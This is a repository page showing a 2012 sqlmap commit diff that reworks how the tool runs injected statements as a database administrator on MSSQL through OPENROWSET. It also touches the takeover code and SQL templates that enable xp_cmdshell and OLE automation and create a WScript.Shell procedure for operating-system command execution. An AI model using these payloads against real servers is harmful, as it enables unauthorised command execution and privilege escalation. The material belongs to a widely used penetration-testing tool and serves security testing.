sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-03 13:14:13 +03:00
Code Issues Packages Projects Releases Wiki Activity

more tweaking for issue #34, it's totally not as trivial as it may look (OPENROWSET has many limitations on MSSQL >= 2005)

Browse Source
This commit is contained in:
Bernardo Damele 2012-07-02 15:02:00 +01:00
parent b7d2680e55
commit 04d803c7fd
8 changed files with 52 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
lib/core/agent.py
View File

@ -11,6 +11,7 @@ from xml.etree import ElementTree as ET
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getSPQLSnippet
from lib.core.common import isDBMSVersionAtLeast
from lib.core.common import isTechniqueAvailable
from lib.core.common import randomInt
@ -27,6 +28,7 @@ from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import FROM_DUMMY_TABLE
from lib.core.settings import GENERIC_SQL_COMMENT
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import SQL_STATEMENTS
from lib.core.unescaper import unescaper
class Agent:
@ -816,5 +818,20 @@ class Agent:
return re.sub("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), "%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER), inpStr) if inpStr else inpStr
def runAsDBMSUser(self, query):
if conf.dCred and "Ad Hoc Distributed Queries" not in query:
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
for sqlStatement in sqlStatements:
if query.lower().startswith(sqlStatement):
sqlType = sqlTitle
break
if sqlType and "SELECT" not in sqlType:
query = "SELECT %d;%s" % (randomInt(), query)
query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
return query
# SQL agent
agent = Agent()

24
lib/takeover/abstraction.py
View File

@ -10,13 +10,13 @@ from lib.core.common import dataToStdout
from lib.core.common import Backend
from lib.core.common import getSPQLSnippet
from lib.core.common import isTechniqueAvailable
from lib.core.common import randomInt
from lib.core.common import readInput
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.settings import SQL_STATEMENTS
from lib.core.shell import autoCompletion
from lib.request import inject
from lib.takeover.udf import UDF
@ -38,21 +38,6 @@ class Abstraction(Web, UDF, xp_cmdshell):
Web.__init__(self)
xp_cmdshell.__init__(self)
def runAsDBMSUser(self, query):
if conf.dCred:
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
for sqlStatement in sqlStatements:
if query.lower().startswith(sqlStatement):
sqlType = sqlTitle
break
if sqlType and "SELECT" not in sqlType:
query = "SELECT 1;%s" % query
query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
return query
def execCmd(self, cmd, silent=False):
if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
self.webBackdoorRunCmd(cmd)
@ -201,6 +186,13 @@ class Abstraction(Web, UDF, xp_cmdshell):
if mandatory and not self.isDba():
warnMsg = "the functionality requested might not work because "
warnMsg += "the session user is not a database administrator"
if not conf.dCred and Backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.PGSQL ):
warnMsg += ". You can try to provide --dbms-cred switch "
warnMsg += "to execute statements as a DBA user if you "
warnMsg += "were able to extract and crack a DBA "
warnMsg += "password by any mean"
logger.warn(warnMsg)
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):

33
lib/takeover/xp_cmdshell.py
View File

@ -5,6 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import getSPQLSnippet
from lib.core.common import hashDBWrite
@ -40,26 +41,28 @@ class xp_cmdshell:
if Backend.isVersionWithin(("2005", "2008")):
logger.debug("activating sp_OACreate")
cmd += "EXEC master..sp_configure 'show advanced options', 1; "
cmd += "RECONFIGURE WITH OVERRIDE; "
cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
cmd += "RECONFIGURE WITH OVERRIDE; "
inject.goStacked(cmd)
cmd += "EXEC master..sp_configure 'show advanced options',1;"
cmd += "RECONFIGURE WITH OVERRIDE;"
cmd += "EXEC master..sp_configure 'ole automation procedures',1;"
cmd += "RECONFIGURE WITH OVERRIDE"
inject.goStacked(agent.runAsDBMSUser(cmd))
self.__randStr = randomStr(lowercase=True)
self.__xpCmdshellNew = randomStr(lowercase=True)
self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew
cmd += "DECLARE @%s nvarchar(999); " % self.__randStr
cmd = "DECLARE @%s nvarchar(999);" % self.__randStr
cmd += "set @%s='" % self.__randStr
cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int "
cmd += "EXEC sp_OACreate ''WScript.Shell'', @ID OUT "
cmd += "EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 "
cmd += "EXEC sp_OADestroy @ID'; "
cmd += "EXEC master..sp_executesql @%s;" % self.__randStr
cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
cmd += "EXEC sp_OADestroy @ID';"
cmd += "EXEC master..sp_executesql @%s" % self.__randStr
if Backend.isVersionWithin(("2005", "2008")):
cmd += " RECONFIGURE WITH OVERRIDE;"
cmd += ";RECONFIGURE WITH OVERRIDE"
inject.goStacked(cmd)
inject.goStacked(agent.runAsDBMSUser(cmd))
def __xpCmdshellConfigure2005(self, mode):
debugMsg = "configuring xp_cmdshell using sp_configure "
@ -88,7 +91,7 @@ class xp_cmdshell:
else:
cmd = self.__xpCmdshellConfigure2000(mode)
inject.goStacked(cmd)
inject.goStacked(agent.runAsDBMSUser(cmd))
def __xpCmdshellCheck(self):
cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2)
@ -153,7 +156,7 @@ class xp_cmdshell:
self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
return self.runAsDBMSUser(self.__forgedCmd)
return agent.runAsDBMSUser(self.__forgedCmd)
def xpCmdshellExecCmd(self, cmd, silent=False):
cmd = self.xpCmdshellForgeCmd(cmd)

2
procs/mssqlserver/configure_openrowset.txt
View File

@ -3,4 +3,4 @@ RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE WITH OVERRIDE;
RECONFIGURE WITH OVERRIDE

8
procs/mssqlserver/configure_xp_cmdshell.txt
View File

@ -1,6 +1,6 @@
EXEC master..sp_configure 'show advanced options', 1;
EXEC master..sp_configure 'show advanced options',1;
RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'xp_cmdshell', %ENABLE%;
EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options',0;
RECONFIGURE WITH OVERRIDE

2
procs/mssqlserver/disable_xp_cmdshell_2000.txt
View File

@ -1 +1 @@
EXEC master..sp_dropextendedproc 'xp_cmdshell';
EXEC master..sp_dropextendedproc 'xp_cmdshell'

2
procs/mssqlserver/enable_xp_cmdshell_2000.txt
View File

@ -1 +1 @@
EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll';
EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'

3
procs/mssqlserver/run_statement_as_user.txt
View File

@ -1 +1,2 @@
SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%');
SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')
# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')